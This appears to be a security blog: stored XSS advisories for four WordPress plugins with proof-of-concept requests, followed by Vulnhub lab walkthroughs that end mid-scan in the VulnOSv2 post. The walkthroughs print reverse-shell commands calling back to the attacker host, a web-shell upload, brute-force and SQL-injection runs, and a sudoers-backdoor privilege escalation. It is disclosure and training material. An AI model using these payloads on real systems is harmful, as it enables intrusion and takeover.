Stored XSS Vulnerability in WordPress Responsive Lightbox2 Plugin

WordPress Responsive Lightbox2 Plugin version 1.0.2 and below were found to be vulnerable to stored XSS while I was auditing the plugin.

Summary

WordPress Responsive Lightbox2 plugin is used to add a lightbox functionality to your WordPress site. It was found to be vulnerable to Stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.

Vulnerability

The ‘hyperlink’ field in used while linking an image from a URL was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used. All WordPress websites using Responsive Lightbox2 version 1.0.2 and below are affected.

The image below shows our javascript is being executed when the following string is inserted into the post.

[lightbox2 url="http://example.com/wp-content/uploads/images/lightbox.jpg" hyperlink="<script>alert(0)</script>"]

This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website. A less privileged user can exploit this vulnerability to steal the administrator’s cookies for privilege escalation.

Proof of Concept

POST /w/wp-json/wp/v2/posts/208?_locale=user HTTP/1.1
Host: 127.0.0.1
Content-Length: 140
Accept: application/json, */*;q=0.1
X-WP-Nonce: 6c6cd8b63e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: http://127.0.0.1
Referer: http://127.0.0.1/w/wp-admin/post.php?post=208&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597422791
Connection: close

{"id":208,"content":"[lightbox2 url=\"http://example.com/wp-content/uploads/images/lightbox.jpg\" hyperlink=\"<script>alert(0)</script>\"]"}

Recommendation

All user inputs should be sanitized before publishing the post.

Stored XSS Vulnerability in WordPress NextGen Gallery Sell Photo Plugin

WordPress NextGen Gallery Sell Photo Plugin version 1.0.4 and below were found to be vulnerable to stored XSS while I was auditing the plugin.

Summary

WordPress NextGen Gallery Sell Photo plugn is used to sell photos directly from NextGen Gallery in WordPress blog with payment through PayPal. It was found to be vulnerable to Stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.

Vulnerability

The Button Text/Image field in Settings page of Sell Photos Plugin was found to be vulnerable to stored XSS, as they did not sanitize user given input properly. It is triggered when a users loads a page where the plugin is used, and when an admin opens settings page of the plugin.

The image below shows our javascript is being executed when the following string is given in the Button Text/Image field.

Buy Now "><script>alert(0)</script>

This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website.

Proof of Concept

POST /w/wp-admin/options-general.php?page=nextgen-sell-photo-settings HTTP/1.1
Host: 127.0.0.1
Content-Length: 336
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/w/wp-admin/options-general.php?page=nextgen-sell-photo-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7Cb6923f10946ffce4a149ff702761391ed5ab2efed419261f5bd9d173281a1d95; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597422791
Connection: close

_wpnonce=a48671c8bf&_wp_http_referer=%2Fw%2Fwp-admin%2Foptions-general.php%3Fpage%3Dnextgen-sell-photo-settings&paypal_email=john%40zopmail.com&currency_code=USD&price_amount=5.00&button_anchor=Buy+Now+%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&return_url=http%3A%2F%2F127.0.0.1%2Fw&ngsp_update_settings=Save+Changes

Recommendation

All users inputs should be sanitized before it is used.

Stored XSS Vulnerability in WordPress Easy Media Download Plugin

WordPress Easy Media Download Plugin version 1.1.4 and below were found to be vulnerable to stored XSS while I was auditing the plugin.

Summary

WordPress Media Download plugn is used to insert a download directly from WordPress post editor without using HTML. It was found to be vulnerable to Stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.

Vulnerability

The ‘Button Text’ field in used while posting a file download was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used. All WordPress websites using Easy Media Download by naa986 version 1.1.4 and below are affected.

The image below shows our javascript is being executed when the following string is inserted into the post.

[easy_media_download url="http://example.com/wp-content/uploads/file.zip" text="Free Download <script>alert(document.cookie)</script>"]

This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website. A less privileged user can exploit this vulnerability to steal the administrator’s cookies for privilege escalation.

Proof of Concept

POST /w/wp-json/wp/v2/posts/186?_locale=user HTTP/1.1
Host: 127.0.0.1
Content-Length: 162
Accept: application/json, */*;q=0.1
X-WP-Nonce: 6c6cd8b63e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: http://127.0.0.1
Referer: http://127.0.0.1/w/wp-admin/post.php?post=186&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1597401311
Connection: close

{"id":186,"content":"[easy_media_download url=\"http://example.com/wp-content/uploads/file.zip\" text=\"Free Download <script>alert(document.cookie)</script>\"]"}

Recommendation

All user inputs should be sanitized before publishing the post.

Stored XSS Vulnerability in WordPress Sell Photo Plugin

WordPress Sell Photo Plugin version 1.0.5 and below were found to be vulnerable to stored XSS while I was auditing the plugin.

Summary

WordPress Sell Photo plugn is used to sell photos directly from WordPress blog with payment through PayPal. It was found to be vulnerable to Stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.

Vulnerability

The Button Text/Image field in Settings page of Sell Photos Plugin was found to be vulnerable to stored XSS, as they did not sanitize user given input properly. It is triggered when a users loads a page where the plugin is used, and when an admin opens settings page of the plugin.

The image below shows our javascript is being executed when the following string is given in the Button Text/Image field.

Buy Now "><script>alert(0)</script>

This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website.

Proof of Concept

POST /w/wp-admin/options-general.php?page=sell-photo-settings HTTP/1.1
Host: 127.0.0.1
Content-Length: 339
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/w/wp-admin/options-general.php?page=sell-photo-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7Cb6923f10946ffce4a149ff702761391ed5ab2efed419261f5bd9d173281a1d95; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1597401311
Connection: close

_wpnonce=14d5bbccf9&_wp_http_referer=%2Fw%2Fwp-admin%2Foptions-general.php%3Fpage%3Dsell-photo-settings&enable_testmode=1&paypal_email=jajaja%40zopmail.com&currency_code=USD&price_amount=5.00&button_anchor=Buy+Now+%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&return_url=http%3A%2F%2F95.217.19.38%2Fw&sell_photo_update_settings=Save+Changes

Recommendation

All users inputs should be sanitized before it is used.

References

  1. https://packetstormsecurity.com/files/158872/WordPress-Sell-Photo-1.0.5-Cross-Site-Scripting.html

Mr Robot 1 Vulnhub Machine Walkthrough

Today we will root Mr Robot 1 Machine from Vulnhub.

As usual, First find the IP of the machine.

nmap -sn 192.168.18.0/24

Now Lets do a scan on the machine.

nmap -sV -O -A -T5 192.168.18.96

There is a web server running on port 80. Lets have a look.

Cool, Lets do a directory scan with Gobuster.

root@kali:~# gobuster dir -u 192.168.18.96 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt 

We have wp-content, wp-admin and wp-login in the server. So we can guess that a WordPress installation is there.

Before that, lets have a look at robots.txt.

This robots file blocks fsocity.dic and key-1-of-3.txt.

fsocity.dic is a wordlist. Lets save it so that we can use that for fuzzing later.

This is key-1-of-3. That means we need to find 2 more keys.

Now we need to find the username and password. Go to the login page and try usual combinations.

Now lets try to find out usernames from our .dic file using Burpsuite.

Capture the request and send it to intruder.

Click clear and select the username field as position to insert the payload.

Now run this command to remove the repeating lines in the file fsocity.dic

sort fsocity.dic | uniq > test.txt

The first file is 6MB and our new file is just 94KB. Use this file as payload list in Burp.

Now load the file and start attack. The attack will be faster in paid versions of Burpsuite.

The usual response length is 4145 if the username is wrong. But then the username is elliot the response length is 4196. Lets try that in browser.

The username elliot is right. Now we need to find the password using the same method.

Get the login request, Send to intruder, and use the same file for fuzzing.

We got the password too. ER28-0652.

and logged in.

Now we need a reverse shell. Lets do that by editing a page template.

Visit the following page and select 404 Template.

http://192.168.18.96/wp-admin/theme-editor.php

This page is shown in case of a 404 error in this WordPress installation. If we add our backdoor script in this template and try to load a non-existing page, we can get a reverse shell. Paste the contents of following file there.

http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz

and update the IP and port with your attacker IP and listening port number.

Lets get a shell from this page first listen from kali with nc and connect from the server.

nc -nlvp 4444

Visit any non existent page in the site

http://192.168.18.96/melbin.in

We got a shell.

When we look at the home folder of user robot. We can find a file named password-raw-md5.

We also have a the key 2 of 3 but we dont have the read permission.

Lets open the password.raw-md5 file.

Lets copy the md5 hash and search online.

https://md5.gromweb.com/?md5=c3fcd3d76192e4007dfb496cca67e13b

We have the password of robot. Lets change user to robot now. But we need to run that from a TTY shell. Use this command.

python -c 'import pty; pty.spawn("/bin/sh")'

We have nmap in the machine, we can verify it by

which nmap

Now have a look at https://gtfobins.github.io/gtfobins/nmap/#sudo to learn how to do privilege escalation with nmap.

lets try this.

We got root access now. Lets read the second flag.

What about third flag?

It is here.

Lets read that too.

So, we have completed Mr. Robot 1.

Cheers!

Skytower 1 Vulnhub Machine Walkthrough

Today, Lets work on the Skytower 1 Vulnhub Machine.

Lets find the IP first.

root@kali:~# nmap -sn 192.168.18.0/24
Nmap scan report for 192.168.18.94
Host is up (0.0086s latency).
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

So, our IP is 192.168.18.94. Lets do a simple port scan.

root@kali:~# nmap -O -sV 192.168.18.94

There is. web server running on port 80. Lets have a look.

A login page, Lets try SQL Injection.

We can use Burpsuite for this. Download a list of payloads to be checked from here.

https://github.com/melbinkm/SQL-Injection-Payloads/blob/master/sqli_auth.list

Now lets capture the request in Burp

Then, Right click and send to Intruder.

Set attack type to ‘pitchfork‘ and make sure that the email and password fields are selected.

Now, Go to payloads and load the payload list we downloaded to first and second payloads.

and click Start Attack.

When the attack goes on, we can notice the response length of some requests are 231 and some are 1838. The ones with 1838 are the ones we want. They are successful logins.

Here lets try '-' as email and password.

and, we’re in!

We have the SSH login credentials now. Lets try logging in.

Its not getting connected. But remember, we have a Squid proxy opened on port 3128.

Lets try connecting through it.

add the following line to /etc/proxychains.conf

http 192.168.18.94 3128

Now, lets try connecting to the machine.

We logged in to the server, and logged out automatically. lets try running a command upon login.

root@kali:~# proxychains ssh -t [email protected] ls -la

Ok, So our command is working. Still we are getting logged out. Lets try to get a reverse shell through this.

First check if netcat is present there.

Yes, Now lets spawn a reverse shell.

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...

We have executed the command and got a reverse shell in our kali machine.

We are in, now lets have a look at /etc/passwd

There are two more users, sara and william.

Lets try to find out the passwords of sara and william too and log in.

username: [email protected]
password: '-'

username: [email protected]
password: '-'

We got the password of sara. Lets try logging in.

root@kali:~# proxychains ssh -t [email protected] nc 192.168.18.92 4444 -e /bin/bash

We got access to sara’s account.

run sudo -l ro view sara’s sudo permissions.

So, Sara can use cat and ls in /accounts/ directory with root permissions.

According to this page, https://superuser.com/questions/355029/how-to-automatically-run-commands-on-ssh-login

we can execute a script upon ssh login if we place that in .bashrc file.

Lets have a look.

cat .bashrc

Lets try removing this and login again.

rm .bashrc

Logged in.

Now we can use sudo ls /accounts/ on the machine with root permissions.

What about sudo ls /accounts/../ ? Lets try

Using this method, we can go back to /root directory and find a flag.txt file there.

Now use cat to read the file.

sudo cat /accounts/../root/flag.txt

We got the root password now. Lets try to be root using su command.

We are root!

Hacklab Vulnix, Vulnhub Machine Walkthrough

Today we are working on the Vulnix machine from Vulnhub.

Lets find the IP first.

nmap -sN 192.168.18.92/24

We got the IP, 192.168.18.93

Lets do a detailed scan now.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-12 04:47 EDT

Nmap scan report for 192.168.18.93
Host is up (0.0050s latency).
Not shown: 65518 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
 
25/tcp    open  smtp       Postfix smtpd
 
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
| 
|_sslv2-drown: 
79/tcp    open  finger     Linux fingerd
|
110/tcp   open  pop3       Dovecot pop3d
|_
|  
|_sslv2-drown: 
111/tcp   open  rpcbind    2-4 (RPC #100000)
|
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      33365/udp6  mountd
|   100005  1,2,3      47947/tcp6  mountd
|   100005  1,2,3      56458/udp   mountd
|   100005  1,2,3      57756/tcp   mountd
|   100021  1,3,4      39547/udp   nlockmgr
|   100021  1,3,4      47952/tcp6  nlockmgr
|   100021  1,3,4      53508/udp6  nlockmgr
|   100021  1,3,4      53795/tcp   nlockmgr
|   100024  1          38357/udp   status
|   100024  1          39369/tcp   status
|   100024  1          48082/udp6  status
|   100024  1          57952/tcp6  status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
143/tcp   open  imap       Dovecot imapd
|_
512/tcp   open  exec       netkit-rsh rexecd

513/tcp   open  login?

514/tcp   open  tcpwrapped
|
993/tcp   open  ssl/imaps?
|_

995/tcp   open  ssl/pop3s?

2049/tcp  open  nfs_acl    2-3 (RPC #100227)

39369/tcp open  status     1 (RPC #100024)
 
42985/tcp open  mountd     1-3 (RPC #100005)
 
48267/tcp open  mountd     1-3 (RPC #100005)
 
53795/tcp open  nlockmgr   1-4 (RPC #100021)
 
57756/tcp open  mountd     1-3 (RPC #100005)
 
MAC Address: 08:00:27:67:74:42 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   4.97 ms 192.168.18.93

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.55 seconds

finger is running on port 79. Lets do some user enumeration first.

We got a few users.

Lets try bruteforcing the logins.

make a text file with usernames.

Lets run medusa with rockyou.txt

medusa -h 192.168.18.93 -U vulnix_users.txt -P rockyou.txt -e ns -f -M ssh > medusa.txt

Let’s try to enumerate further when the brute forcing is going on in the background.

From the detailed scan above, we can see thet NFS is running on port 2049. Lets go deeper.

nmap -sV --script=nfs-* 192.168.18.93

We have an NFS share at /home/vulnix. Lets try to mont it to our machine.

But, we dont have permission to open it.

Lets go back to our medusa and check the results.

So, the password for user is letmein.

Lets try to login to the machine.

Lets now check the /etc/passwd file and get details for vulnix user.

If we add this user to our system with same uid as 2008, we can read the mounted directory. Right? Lets try.

useradd -u 2008 vulnix
su vulnix
cd /tmp/vulnix
ls -la

We got access to vulnix’s home folder.

If we place our id_rsa.pub key in /mnt/vulnix/.ssh/authorized_keys we can login without passsword.

Create a key, if you have not created yet.

ssh-keygen -t rsa

Now add the public key to /tmp. and change the owner to vulnix.

add the file to /mnt/vulnix/.ssh/authorized_keys

Now we can login as vulnix on the target machine without password.

Lets see what can we do with this user.

sudo -l

We can edit the /etc/exports file as root without password.

According to this article, https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ , the *(rw,root_squash) is used to prevent file access as root. Since we have edit acces to this file. we can change that.

Made the change and saved.

We need to restart NFS to bring our change into action, since we dont have root access, lets restart the machine.

Now remount the share and copy our /bin/bash to the mounted directory.

root@kali:/mnt/vulnix# cp /bin/bash .

The file is present in the home folder of vulnix, with owner as root. Lets try to run that.

./bash
whoami
root

So we got the root access in Vulnix too. Next day next Machine!

SickOs: 1.2 Vulnhub Machine Walkthrough

Today we are playing with SickOs 1.2 from Vulnhub.

Get the IP first.

nmap -sP 192.168.18.0/24

The IP address is 192.168.18.90.

Lets do a detailed scan now

root@kali:~# nmap 192.168.18.90 -A -O -sV -T5 -p- --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 04:22 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.90
Host is up (0.0010s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /test/: Test page
|_http-server-header: lighttpd/1.4.28
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:lighttpd:lighttpd:1.4.28: 
|       CVE-2013-4559   7.6     https://vulners.com/cve/CVE-2013-4559
|       CVE-2014-2323   7.5     https://vulners.com/cve/CVE-2014-2323
|       CVE-2013-4508   5.8     https://vulners.com/cve/CVE-2013-4508
|       CVE-2018-19052  5.0     https://vulners.com/cve/CVE-2018-19052
|       CVE-2014-2324   5.0     https://vulners.com/cve/CVE-2014-2324
|       CVE-2011-4362   5.0     https://vulners.com/cve/CVE-2011-4362
|_      CVE-2013-4560   2.6     https://vulners.com/cve/CVE-2013-4560
MAC Address: 08:00:27:65:6A:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.18, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.04 ms 192.168.18.90

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.84 seconds

We have nothing interesting in index.php.

but there is a page /test

Lets use CURL and check allowed HTTP Options.

curl -v -X OPTIONS http://192.168.18.90/test

Here PUT is allowed. Lets try uploading a php shell there.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Lets download this and PUT to the server.

wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
tar -xzf php-reverse-shell-1.0.tar.gz

Edit the IP and PORT in the script.

Start a netcat listener in our machine

nc -nlvp 5555

and upload to server

curl --upload-file  shell.php -v --url http://192.168.18.90/test/shell.php -0 --http1.0

Now try to access this in the server.

WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110) 

Looks like a problem with firewall. Lets try on port 443. Edit the file and re-upload to target.

We gota connection from the server. Great.

Lets now try to escalate privileges.

First get a TTY shell with the following command

python -c 'import pty;pty.spawn("/bin/bash")'

Lets have a look at the cron jobs.

ls -l /etc/cron.daily

There is a cron job with chkrootkit. We have a vulnerability for chkrootkit here.

https://www.exploit-db.com/exploits/33899

chkrootkit will run any executable placed as /tmp/update with root privileges.

Lets create the file.

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update

Here our cron job runs daily. So we need to wait till next time the job runs. Use this command to check if the file is updated.

ls -la /etc/sudoers

After a few minutes the /etc/sudoers file got updated.

Now check our privileges.

We are root now. Lets find the flag.

SickOS v2 conquered! Next day next machine!

VulnOSv2 Vulnhub Machine Walkthrough

Today, We are working on VulnOSv2 machine from Vulnhub.

First lets find the IP.

nmap 192.168.18.0/24

So, 192.168.18.88 is our machine’s IP.

Lets do a detailed scan now.

root@kali:~# nmap -p- -A -T5 -sV -O --script vuln 192.168.18.88
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 12:44 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.88
Host is up (0.00073s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.18.88
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/5
|     Form id: commerce-cart-add-to-cart-form-2
|     Form action: /jabc/?q=node/5
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/6
|     Form id: commerce-cart-add-to-cart-form-3
|     Form action: /jabc/?q=node/6
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/4
|     Form id: commerce-cart-add-to-cart-form-1
|_    Form action: /jabc/?q=node/4
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=N%3bO%3dA%27%20OR%20sqlspider
|_    http://192.168.18.88:80/jabc/misc/?C=D%3bO%3dD%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.7: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2014-0226   6.8     https://vulners.com/cve/CVE-2014-0226
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-2161   5.0     https://vulners.com/cve/CVE-2016-2161
|       CVE-2016-0736   5.0     https://vulners.com/cve/CVE-2016-0736
|       CVE-2014-3523   5.0     https://vulners.com/cve/CVE-2014-3523
|       CVE-2014-0231   5.0     https://vulners.com/cve/CVE-2014-0231
|       CVE-2020-11985  4.3     https://vulners.com/cve/CVE-2020-11985
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2015-3185   4.3     https://vulners.com/cve/CVE-2015-3185
|       CVE-2014-8109   4.3     https://vulners.com/cve/CVE-2014-8109
|       CVE-2014-0118   4.3     https://vulners.com/cve/CVE-2014-0118
|       CVE-2014-0117   4.3     https://vulners.com/cve/CVE-2014-0117
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
6667/tcp open  irc     ngircd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
MAC Address: 08:00:27:6B:9D:FC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
